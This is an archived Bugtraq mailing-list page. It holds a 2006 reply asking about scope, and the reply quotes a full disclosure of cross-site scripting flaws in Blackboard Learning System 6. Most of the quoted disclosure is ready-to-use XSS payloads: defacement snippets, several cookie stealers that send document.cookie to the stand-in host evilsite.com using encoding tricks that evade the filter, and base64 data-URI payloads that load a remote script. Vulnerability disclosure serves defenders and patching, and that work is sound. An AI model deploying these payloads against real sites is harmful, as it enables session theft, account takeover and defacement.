Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: BlackBoard Multiple Vulnerabilities (XSS)

from [C. Hamby] Network Security [Permanent Link]
Subject: Re: BlackBoard Multiple Vulnerabilities (XSS)
Date: Tue, 22 Aug 2006 16:57:40 -0800 
What type of an account do you have to have and in what sections can
this be exploited?
Also, has Blackboard verified this in their current release (7.1)?

-cdh


Pr070n@gmail.com wrote:

-----------------------------------------------------------------------------------------


Found by: PrOtOn & digi7al64


Date: May 20th 2006


Critical Level: High


Type: Multiple Cross Site Scripting (XSS) vunerabilities



------------------------------------------------------------------------------------------



Software:

Blackboard Learning System (Release 6) Blackboard Learning and Community 
Portal Suite (Release6)-6.2.3.23



------------------------------------------------------------------------------------------



Explanation: You can inject HTML, VB code and or Javascript into specific 
tags to steal 

cookies, deface the site using frame busters or even redirect to external 
sites for phishing purposes. 

If you have limited access, then a simple post into the Discussion Board 
using the right 

tags with the right code (provided below) will execute the vulnerability(ies).



-------------------------------------------------------------------------------------------


About:

Blackboards parsing system only checks for the string "javascript", Thus 
vbscript code can be injected at will into tags as well as any versions of 
javascript that uses uncommon syntax (ie tabs encoding etc)


-------------------------------------------------------------------------------------------

Vulnerabilities:


Defacement (FrameBuster)

-------------------------

<meta http-equiv="refresh"

content="15;url= http://evilsite.com";>



Defacement (FrameBuster)

-------------------------

<iframe src=" http://evilsite.com"; width=100

height=100></iframe>



Defacement (IE ONLY)

-------------------------

<img src=vbscript:document.write("defaced_by_insane_script_kiddies")>



Defacement (IE ONLY)

-------------------------

<link rel="stylesheet"

href=vbscript:document.write("defaced_by_insane_script_kiddies")>


<img src=vb script:document.write("defaced_by_insane_script_kiddies")>



Cookie Stealer (IE ONLY)

-------------------------


<img

src="vbscript:wintest=window.open(%22http://evilsite.com + 
document.cookie)"style=visibility:hidden/>

<img src="vbscript:window.focus ()"style=visibility:hidden/>

<img src="vbscript: window.close()"style=visibility:hidden/>



Cookie Stealer (IE ONLY)

-------------------------

<link rel="stylesheet"

href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)">



Cookie Stealer (Encoded Tab - IE ONLY)

-------------------------

<img

src="jav&#x09;ascript: 
document.images[1].src=%22http://evilsite.com+document.cookie;";<img src="jav

ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>



Cookie Stealer (html encoded - IE ONLY)

-------------------------

<img

src='&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;document.images[1].s

rc=" http://evilsite.com"+document.cookie;'<img

src="jav

ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>



Cookie Stealer (tabs - IE ONLY)

-------------------------

<img src="jav

ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>



Cookie Stealer (body tag with tabs - IE ONLY)

-------------------------

<body background="jav

ascript:document.images[1].src=%22http://evilsite.com+document.cookie;";>



Cookie Stealer (div tag with tabs - IE ONLY)

-------------------------

<div style="background-image: url(jav

ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)">



Cookie Stealer (firefox)

-------------------------

<META HTTP-EQUIV="refresh"

CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=";>



Cookie Stealer (firefox - click to work)

-------------------------

<a

href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=";>hmmm</a>
  



---------------------------------------------------------------------------------------------



Disclaimer:

Myself or any other person involved with this discovery will not be 
responsible for what you 

do with this information.

Blackboard developers have been contacted by me and a patch has been released 
according to them.



-----------------------------------------------------------------------------------------------



Shout Outs:

r0xes, criticalsecurity(dot)net, Infowar(dot)com



------------------------------------------------------------------------------------------------



Contact:

Pr070n(at)gmail(dot)com

Digi7al64(at)gmail(dot)com



-------------------------------------------------------------------------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: BlackBoard Multiple Vulnerabilities (XSS), pr0t0n
Next by Date:  AW: Symantec Gateway Security DNS exploit, Andre Braun
Previous by Thread:  BlackBoard Multiple Vulnerabilities (XSS), Pr070n
Next by Thread:  Re: BlackBoard Multiple Vulnerabilities (XSS), pr0t0n
Indexes:  [Date] [Thread] [Top] [All Lists]